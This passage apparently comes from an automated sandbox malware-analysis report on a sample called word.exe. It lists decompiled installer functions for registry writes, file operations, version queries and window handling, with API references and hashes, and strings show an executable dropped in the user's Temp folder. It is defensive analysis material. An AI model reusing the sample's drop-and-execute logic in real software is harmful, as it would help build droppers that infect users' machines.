                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
                                                          • API String ID: 3677997916-1675380478
                                                          • Opcode ID: 20ca1dc64cf80f35bde4a5a459f169022cfe0f17446037da1f5ac97088a586f8
                                                          • Instruction ID: ed18225876ffcc918a102faa5279ae5b239897be87de75614ca521a3281ae21e
                                                          • Opcode Fuzzy Hash: 20ca1dc64cf80f35bde4a5a459f169022cfe0f17446037da1f5ac97088a586f8
                                                          • Instruction Fuzzy Hash: 91015A7114120EEFDB128F64EC84AEB3FACEF14398F004536F954A6120D235D964DFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004055E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004055E7(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                          0x004055e8
                                                          0x004055ff
                                                          0x00405607
                                                          0x00405607
                                                          0x0040560f

                                                          APIs
                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004032E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 004055ED
                                                          • CharPrevA.USER32(?,00000000), ref: 004055F6
                                                          • lstrcatA.KERNEL32(?,00409010), ref: 00405607
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004055E7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-4017390910
                                                          • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                          • Instruction ID: 96202b13295bd2e64ca1d8ffa69cec5526f215a27c510a3f916c0d268ec15c79
                                                          • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                          • Instruction Fuzzy Hash: 27D0A9A2609A302AE20232158C09F8F7A28CF42341B450822F100B2292C23C3C818BEE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402366 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 90%
                                                          			E00402366(void* __eax, void* __eflags) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t32;
				void* _t37;

				_t15 = E00402B7A(__eax);
				_t32 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x34) = E00402A85(2);
				_t18 = E00402A85(0x11);
				_t31 =  *0x423fd0 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423fd0 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t32 == 1) {
						E00402A85(0x23);
						_t19 = lstrlenA(0x409bf8) + 1;
					}
					if(_t32 == 4) {
						_t24 = E00402A68(3);
						 *0x409bf8 = _t24;
						_t19 = _t32;
					}
					if(_t32 == 3) {
						_t19 = E00402F71(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x409bf8, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x34), _t27,  *(_t37 - 0x30), 0x409bf8, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423fa8 =  *0x423fa8 +  *(_t37 - 4);
				return 0;
			}










                                                          0x00402367
                                                          0x0040236c
                                                          0x00402376
                                                          0x00402380
                                                          0x00402383
                                                          0x00402393
                                                          0x0040239d
                                                          0x004023a4
                                                          0x004023ac
                                                          0x004023ba
                                                          0x004023be
                                                          0x004023c9
                                                          0x004023c9
                                                          0x004023cd
                                                          0x004023d1
                                                          0x004023d7
                                                          0x004023dc
                                                          0x004023dc
                                                          0x004023e0
                                                          0x004023ec
                                                          0x004023ec
                                                          0x00402405
                                                          0x00402407
                                                          0x00402407
                                                          0x0040240a
                                                          0x004024e0
                                                          0x004024e0
                                                          0x0040291d
                                                          0x00402929

                                                          APIs
                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?), ref: 004023A4
                                                          • lstrlenA.KERNEL32(00409BF8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C4
                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,00409BF8,00000000), ref: 004023FD
                                                          • RegCloseKey.ADVAPI32(?), ref: 004024E0
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValuelstrlen
                                                          • String ID:
                                                          • API String ID: 1356686001-0
                                                          • Opcode ID: 44def8dede3c5aed97e6aa108d3f1f6d7508e3697ad605c69ac53dd4d90f4f06
                                                          • Instruction ID: 1ead33bacdad0c85318cdbd94ecebf1695d3cac277658b50cebc1fb2c1fe2d1b
                                                          • Opcode Fuzzy Hash: 44def8dede3c5aed97e6aa108d3f1f6d7508e3697ad605c69ac53dd4d90f4f06
                                                          • Instruction Fuzzy Hash: 4A116071E00109BFEB109FA1EE89EAF7A78EB54398F11403AF905B71D1D6B85D019A68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004021C8 Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 93%
                                                          			E004021C8(void* __eflags) {
				void* __ebx;
				char _t34;
				CHAR* _t36;
				CHAR* _t38;
				void* _t41;

				_t38 = E00402A85(_t34);
				 *(_t41 + 8) = _t38;
				_t36 = E00402A85(0x11);
				if(E00405D9C(_t38) != 0) {
					 *(_t41 - 0x54) =  *(_t41 - 8);
					 *((intOrPtr*)(_t41 - 0x50)) = 2;
					( &(_t38[1]))[lstrlenA(_t38)] = _t34;
					( &(_t36[1]))[lstrlenA(_t36)] = _t34;
					E00405B16(_t34, _t36, 0x409bf8, 0x409bf8, 0xfffffff8);
					lstrcatA(0x409bf8, _t36);
					 *(_t41 - 0x4c) =  *(_t41 + 8);
					 *(_t41 - 0x48) = _t36;
					 *(_t41 - 0x3a) = 0x409bf8;
					 *((short*)(_t41 - 0x44)) =  *((intOrPtr*)(_t41 - 0x1c));
					E00404E9F(_t34, 0x409bf8);
					if(SHFileOperationA(_t41 - 0x54) != 0) {
						goto L1;
					}
				} else {
					L1:
					E00404E9F(0xfffffff9, _t34);
					 *((intOrPtr*)(_t41 - 4)) = 1;
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t41 - 4));
				return 0;
			}








                                                          0x004021ce
                                                          0x004021d2
                                                          0x004021db
                                                          0x004021e4
                                                          0x004021f7
                                                          0x004021fa
                                                          0x00402207
                                                          0x00402218
                                                          0x0040221c
                                                          0x00402223
                                                          0x0040222c
                                                          0x00402234
                                                          0x00402237
                                                          0x0040223a
                                                          0x0040223e
                                                          0x0040224f
                                                          0x00000000
                                                          0x00402255
                                                          0x004021e6
                                                          0x004021e6
                                                          0x004021e9
                                                          0x004026bf
                                                          0x004026bf
                                                          0x0040291d
                                                          0x00402929

                                                          APIs
                                                            • Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00008001,00000000,C:\,?,0040570B,C:\,C:\,00000000,C:\,C:\,?,C:\Users\user\AppData\Roaming\word.exe,755513E0,0040543A,?,755513E0), ref: 00405DAA
                                                            • Part of subcall function 00405D9C: FindFirstFileA.KERNELBASE(?,00422580), ref: 00405DB6
                                                            • Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00000000), ref: 00405DC0
                                                            • Part of subcall function 00405D9C: FindClose.KERNELBASE(00000000), ref: 00405DC8
                                                          • lstrlenA.KERNEL32 ref: 00402201
                                                          • lstrlenA.KERNEL32(00000000), ref: 0040220B
                                                          • lstrcatA.KERNEL32(00409BF8,00000000,00409BF8,000000F8,00000000), ref: 00402223
                                                          • SHFileOperationA.SHELL32(?,?,00409BF8,00409BF8,00000000,00409BF8,000000F8,00000000), ref: 00402247
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileFindModelstrlen$CloseFirstOperationlstrcat
                                                          • String ID:
                                                          • API String ID: 2246384517-0
                                                          • Opcode ID: a004e70d55816916d6918ca924290d61a23b4e1e6597895eda44e8916ffc4c11
                                                          • Instruction ID: a3fb08b87a3da4a4acbea606a4f252bd6f521f47b87daa54263f745b893ff540
                                                          • Opcode Fuzzy Hash: a004e70d55816916d6918ca924290d61a23b4e1e6597895eda44e8916ffc4c11
                                                          • Instruction Fuzzy Hash: 36119171E04215AACB10EFEA8D4498EB7B8AF45314F10813BF510F72D2DABC99418BA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401F20 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 85%
                                                          			E00401F20(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E00402A85(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 0x3c) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x34 = __ebp - 8;
							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 8, __ebp - 0x34) != 0) {
								 *(__ebp - 8) = E00405A52(__esi,  *((intOrPtr*)( *(__ebp - 8) + 8)));
								 *(__ebp - 8) = E00405A52(__edi,  *((intOrPtr*)( *(__ebp - 8) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                                                          0x00401f22
                                                          0x00401f2a
                                                          0x00401f2f
                                                          0x00401f34
                                                          0x00401f38
                                                          0x00401f3b
                                                          0x00401f3d
                                                          0x00401f44
                                                          0x00401f4d
                                                          0x00401f55
                                                          0x00401f58
                                                          0x00401f6d
                                                          0x00401f73
                                                          0x00401f86
                                                          0x00401f8f
                                                          0x00401f9b
                                                          0x00401fa0
                                                          0x00401fa0
                                                          0x00401f86
                                                          0x00401fa3
                                                          0x00401bc0
                                                          0x00401bc0
                                                          0x00401f58
                                                          0x0040291d
                                                          0x00402929

                                                          APIs
                                                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F2F
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F4D
                                                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F66
                                                          • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F7F
                                                            • Part of subcall function 00405A52: wsprintfA.USER32 ref: 00405A5F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 1404258612-0
                                                          • Opcode ID: b638af819fa124869f4f0744651443bd380a3e7449b22e631ddc4b1f11902375
                                                          • Instruction ID: 664519773470a51a07128ab34de84be56150192837950b593d79a90dcc03585f
                                                          • Opcode Fuzzy Hash: b638af819fa124869f4f0744651443bd380a3e7449b22e631ddc4b1f11902375
                                                          • Instruction Fuzzy Hash: 3F115EB1A00108BFDB01AFA5DD81EEEBBB8EF44344F10803AF505F21A1D7789A54DB28
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401D68 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 61%
                                                          			E00401D68() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x4093bc->lfHeight =  ~(MulDiv(E00402A68(2), _t6, 0x48));
				 *0x4093cc = E00402A68(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x4093d3 = 1;
				 *0x4093d0 = _t11 & 0x00000001;
				 *0x4093d1 = _t11 & 0x00000002;
				 *0x4093d2 = _t11 & 0x00000004;
				E00405B16(_t18, _t24, _t26, 0x4093d8,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x4093bc);
				_push(_t14);
				_push(_t26);
				E00405A52();
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                          0x00401d76
                                                          0x00401d8f
                                                          0x00401d99
                                                          0x00401d9e
                                                          0x00401da9
                                                          0x00401db0
                                                          0x00401dc2
                                                          0x00401dc8
                                                          0x00401dcd
                                                          0x00401dd7
                                                          0x0040251b
                                                          0x00401569
                                                          0x004028c2
                                                          0x0040291d
                                                          0x00402929

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirect
                                                          • String ID:
                                                          • API String ID: 3272661963-0
                                                          • Opcode ID: 39ab024a4e29bd2e00a8025c4fb31945af92016a005f7318998ecfc7e748a056
                                                          • Instruction ID: ab44fcfaedae078b8a2075b08ba9bdacc1048924ee142b10c901050df09d38a1
                                                          • Opcode Fuzzy Hash: 39ab024a4e29bd2e00a8025c4fb31945af92016a005f7318998ecfc7e748a056
                                                          • Instruction Fuzzy Hash: C8F04471949240AFEB015BB0AE1AB9A3B689719705F145479F641B61E3C6BC19048F2E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403955 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 86%
                                                          			E00403955(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405A6B(__ecx, "1033");
				while(1) {
					_t26 =  *0x423f64;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423f28 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423f60;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423700 = _t18[1];
					 *0x423fc8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x4236fc = _t23;
						E00405A52(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420508, E00405B16(_t13, _t24, _t26, 0x423720, 0xfffffffe));
						_t11 =  *0x423f4c;
						_t27 =  *0x423f48;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405B16(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                          0x00403959
                                                          0x0040395e
                                                          0x00403964
                                                          0x00403969
                                                          0x00403969
                                                          0x00403971
                                                          0x00000000
                                                          0x00000000
                                                          0x00403979
                                                          0x00403981
                                                          0x00403983
                                                          0x00403989
                                                          0x00403989
                                                          0x0040398b
                                                          0x00403997
                                                          0x00000000
                                                          0x00000000
                                                          0x0040399b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040399d
                                                          0x004039a2
                                                          0x004039ab
                                                          0x004039b1
                                                          0x004039b6
                                                          0x004039ca
                                                          0x004039d5
                                                          0x004039ed
                                                          0x004039f3
                                                          0x004039f8
                                                          0x00403a00
                                                          0x00403a21
                                                          0x00403a21
                                                          0x00403a21
                                                          0x00403a02
                                                          0x00403a04
                                                          0x00403a04
                                                          0x00403a08
                                                          0x00403a0f
                                                          0x00403a0f
                                                          0x00403a14
                                                          0x00403a1a
                                                          0x00403a1a
                                                          0x00000000
                                                          0x00403a04
                                                          0x004039b8
                                                          0x004039bd
                                                          0x004039c6
                                                          0x004039bf
                                                          0x004039bf
                                                          0x004039bf
                                                          0x004039bd

                                                          APIs
                                                          • SetWindowTextA.USER32(00000000,00423720), ref: 004039ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: TextWindow
                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 530164218-1176120985
                                                          • Opcode ID: 8e92532aa80ad6ebe9a5af3ec32b3f4998cc8b457f85ca1392f46d3598825830
                                                          • Instruction ID: 8a4911383cf402a951a33a18ad4b30e04e91385bd266f89a5cbd6e28b98f55da
                                                          • Opcode Fuzzy Hash: 8e92532aa80ad6ebe9a5af3ec32b3f4998cc8b457f85ca1392f46d3598825830
                                                          • Instruction Fuzzy Hash: A511C2B1B006119BC720DF15EC809377BBCEB88716769813BD901A73D1D73D9E028A58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00404DEF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00404DEF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420518 != _t22) {
							 *0x420518 = _t22;
							E00405AF4(0x420530, 0x424000);
							E00405A52(0x424000, _t22);
							E0040140B(6);
							E00405AF4(0x424000, 0x420530);
						}
						L11:
						return CallWindowProcA( *0x420520, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E0040476E(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403F41(0x413);
				return 0;
			}




                                                          0x00404dfb
                                                          0x00404e20
                                                          0x00404e40
                                                          0x00404e43
                                                          0x00404e46
                                                          0x00404e5d
                                                          0x00404e63
                                                          0x00404e6a
                                                          0x00404e71
                                                          0x00404e78
                                                          0x00404e7d
                                                          0x00404e83
                                                          0x00000000
                                                          0x00404e93
                                                          0x00404e2d
                                                          0x00404e80
                                                          0x00404e80
                                                          0x00000000
                                                          0x00404e80
                                                          0x00404e39
                                                          0x00404e3b
                                                          0x00000000
                                                          0x00404e3b
                                                          0x00404e01
                                                          0x00000000
                                                          0x00000000
                                                          0x00404e08
                                                          0x00000000

                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00404E25
                                                          • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404E93
                                                            • Part of subcall function 00403F41: SendMessageA.USER32 ref: 00403F53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 502464d238130af793e5dd4416e0b03d6a5de7fe60fe2b59f7980452aa14ff43
                                                          • Instruction ID: 29fcd441dffe1e7b6305a3cd4593f976d2a152948ddea41a7ee803b159643aa2
                                                          • Opcode Fuzzy Hash: 502464d238130af793e5dd4416e0b03d6a5de7fe60fe2b59f7980452aa14ff43
                                                          • Instruction Fuzzy Hash: B1113071600218BBDF219F91EC40A9B3769BF84765F00813AFA08691A2C7B94D91DFED
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402521 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00402521(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E00402A85(0x11));
				} else {
					E00402A68(1);
					 *0x4097f8 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405A6B(_t17 + 8, _t15), "C:\Users\Albus\AppData\Local\Temp", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                          0x00402521
                                                          0x00402521
                                                          0x00402524
                                                          0x0040253f
                                                          0x00402526
                                                          0x00402528
                                                          0x0040252d
                                                          0x00402534
                                                          0x00402546
                                                          0x004026bf
                                                          0x004026bf
                                                          0x0040254c
                                                          0x0040255e
                                                          0x004015ae
                                                          0x004015b0
                                                          0x00000000
                                                          0x004015b6
                                                          0x004015b0
                                                          0x0040291d
                                                          0x00402929

                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000011), ref: 0040253F
                                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp,00000000,?), ref: 0040255E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
